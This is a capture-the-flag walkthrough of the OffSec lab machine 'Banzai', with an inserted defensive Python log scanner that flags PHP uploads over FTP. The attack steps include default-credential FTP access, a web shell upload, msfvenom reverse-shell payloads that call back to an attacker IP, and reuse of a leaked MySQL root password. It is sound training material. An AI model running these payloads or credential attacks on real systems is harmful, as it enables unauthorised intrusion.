Banzai Walkthrough
Platform: Offsec | PG Practice
Difficulty: MEDIUM
OS: Linux
Author: Pawan Kumar (Vulntricks)
🛰️ 1. Reconnaissance
Quick Scanning
Using RustScan for a quick scan.
└─$ rustscan -a $IP -- -sV -sC
Host is up, received echo-reply ttl 61 (0.078s latency).
Scanned at 2025-08-27 15:08:47 IST for 65s
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 61 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 ba:3f:68:15:28:86:36:49:7b:4a:84:22:68:15:cc:d1 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCybLhvDM6WN4Um6RXgjUecDnd4j/h14PyuqRaLgWRDaQlyWakjDG21gvvltRKiKfDvTHXBS+gDAbGLEmD58g41NE1ocCf5uGtmn79Z3BOR+7BdP1PETWb4a9GR+PdrvXpD16mIHZORhs4RAkeBpexcKOkFXCFatjymyVAcNB8E+Twh879lb55hxEz9cLlA8RAiPPfuW5S7nCRhw7xEi9mdtlvURCFNLb7eCGDUOQu5op2r6XpxZi0eYXJVde/13AiYxvACA2sRoMDCQwIYLhXwpA1Z7LseLxSmMHwyDXrxCU9xDJ+HL9EaHozBdHCOnnuHqPtb5EPZ3/JTg3qnS0dR
| 256 2d:ec:3f:78:31:c3:d0:34:5e:3f:e7:6b:77:b5:61:09 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNRPQTMD0l4TqSTmzmck9Rhq1ULCN0ErNvXipXv1HBKoRUgdbdwxhFerbDTxxJYd+12RFoZgNNUDZmSH7+PGvpo=
| 256 4f:61:5c:cc:b0:1f:be:b4:eb:8f:1c:89:71:04:f0:aa (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDpzo9sh+q0DgrOjD1plfJ9xj9zIjezUBGWzdNlde40M
25/tcp open smtp syn-ack ttl 61 Postfix smtpd
|_smtp-commands: banzai.offseclabs.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
5432/tcp open postgresql syn-ack ttl 61 PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.19
|_ssl-date: TLS randomness does not represent time
8080/tcp open http syn-ack ttl 61 Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: 403 Forbidden
8295/tcp open http syn-ack ttl 61 Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: Banzai
|_http-server-header: Apache/2.4.25 (Debian)
Service Info: Hosts: banzai.offseclabs.com, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Enumeration
Enumerating port 21 FTP
A quick check for anonymous login failed.
Enumerating port 25 SMTP
Checking for SMTP users from the list I created:
└─$ smtp-user-enum -M VRFY -U users.txt -t $IP
We see there is a banzai user; we can use it later for brute-forcing if we don't find a direct exploit.
Enumerating port 5432 PostgreSQL
Searching for an exploit for our version 9.6.4; it could be vulnerable.
PORT 8295 HTTP
From a high-level enumeration I see some names that we can consider as usernames.
Initial Access
Could not find anything successful, so I started with some default usernames and passwords on FTP.
admin:admin - successful
These are the files from the website on port 8295. We can try putting some web shell and then
└─$ ftp -A admin@$IP
Connected to 192.168.237.56.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> mput webshell.php
mput webshell.php [anpqy?]? y
200 EPRT command successful. Consider using EPSV.
150 Ok to send data.
100% |**********************************************************************************************************| 311 1.90 MiB/s 00:00 ETA
226 Transfer complete.
311 bytes sent in 00:00 (1.14 KiB/s)
ftp>
Command execution from web shell
Successfully got command execution.
And found some more info.
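From the defender's side, the FTP upload above leaves a trace in the FTP server's transfer log. The following is an added example, not part of the original walkthrough: it scans vsftpd log lines for successful uploads of script-like files under the web root. The log format (vsftpd's native format with absolute paths), the extension list, and the sample lines are assumptions; the web root comes from the shell prompt shown later on this page.

```python
import posixpath
import re

# Assumed input: vsftpd's native log format (xferlog_std_format=NO), absolute paths.
UPLOAD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d [\d:]{8} \d{4}) \[pid \d+\] \[(?P<user>[^\]]+)\] '
    r'OK UPLOAD: Client "(?P<client>[^"]+)", "(?P<path>[^"]+)"'
)
# Assumed values: web root as seen in the walkthrough's shell prompt; the
# extension list is a hypothetical starting point for a PHP-enabled Apache.
WEB_ROOTS = ("/var/www/html",)
SCRIPT_EXTS = {"php", "php5", "phtml", "phar"}

def script_uploads(lines, web_roots=WEB_ROOTS, exts=SCRIPT_EXTS):
    """Return successful FTP uploads that place a script-like file under a web root."""
    hits = []
    for line in lines:
        m = UPLOAD_RE.match(line)
        if not m:
            continue  # logins, downloads, failed uploads and other lines
        path = posixpath.normpath(m["path"])  # collapse ../ and // before comparing
        if not any(path.startswith(r.rstrip("/") + "/") for r in web_roots):
            continue
        # Check every dot-separated part so "a.PHP.jpg" is caught as well as "x.php".
        parts = posixpath.basename(path).lower().split(".")[1:]
        if exts.intersection(parts):
            hits.append({"time": m["ts"], "user": m["user"],
                         "client": m["client"], "path": path})
    return hits

# Constructed sample lines (not taken from the target's logs).
SAMPLE_LOG = [
    'Wed Aug 27 15:20:01 2025 [pid 1234] [admin] OK LOGIN: Client "192.168.45.181"',
    'Wed Aug 27 15:20:09 2025 [pid 1236] [admin] OK UPLOAD: Client "192.168.45.181", "/var/www/html/webshell.php", 311 bytes, 1.14Kbyte/sec',
    'Wed Aug 27 15:21:30 2025 [pid 1236] [admin] OK UPLOAD: Client "192.168.45.181", "/var/www/html/img/logo.png", 2048 bytes, 9.10Kbyte/sec',
    'Wed Aug 27 15:22:02 2025 [pid 1236] [admin] FAIL UPLOAD: Client "192.168.45.181", "/var/www/html/x.php", 0.00Kbyte/sec',
    'Wed Aug 27 15:23:11 2025 [pid 1236] [admin] OK UPLOAD: Client "192.168.45.181", "/tmp/../var/www/html/css/a.PHP.jpg", 311 bytes, 1.14Kbyte/sec',
    'Wed Aug 27 15:24:40 2025 [pid 1236] [admin] OK UPLOAD: Client "192.168.45.181", "/home/admin/notes.php", 90 bytes, 0.50Kbyte/sec',
]

if __name__ == "__main__":
    for hit in script_uploads(SAMPLE_LOG):
        print(hit)
```

A hit here is also a prompt to review why an FTP account can write into a directory that Apache serves and executes PHP from.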
Reverse shell
Attempt 1
Tried reverse shell commands but failed.
Attempt 2
Generated a shell using msfvenom
─$ msfvenom --payload linux/x64/shell/reverse_tcp LHOST=192.168.45.181 LPORT=8080 -f elf -o shell.elf
and uploaded it over FTP, made it executable and saved it in the /tmp directory.
It failed again, with a segmentation fault.
Attempt 3
I realized my mistake from the 2nd attempt: the system was 32-bit and the exploit created was x64, so it failed. I changed the exploit to x86 and it worked.
─$ msfvenom --payload linux/x86/shell/reverse_tcp LHOST=192.168.45.181 LPORT=8080 -f elf -o shell.elf
Privilege Escalation
Getting TTY shell
which python
/usr/bin/python
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@banzai:/var/www/html$ whoami
Reviewing LinPEAS results
While looking across the files, I found a configuration file.
Opening this file gave me the user and password for MySQL,
and I was able to log in to MySQL.
www-data@banzai:/tmp$ mysql -u root -p
mysql -u root -p
Enter password: EscalateRaftHubris123
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5
Server version: 5.7.30 MySQL Community Server (GPL)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Looked around a little and found nothing useful, so I looked into the version.
Found an exploit and voilà, got the root shell.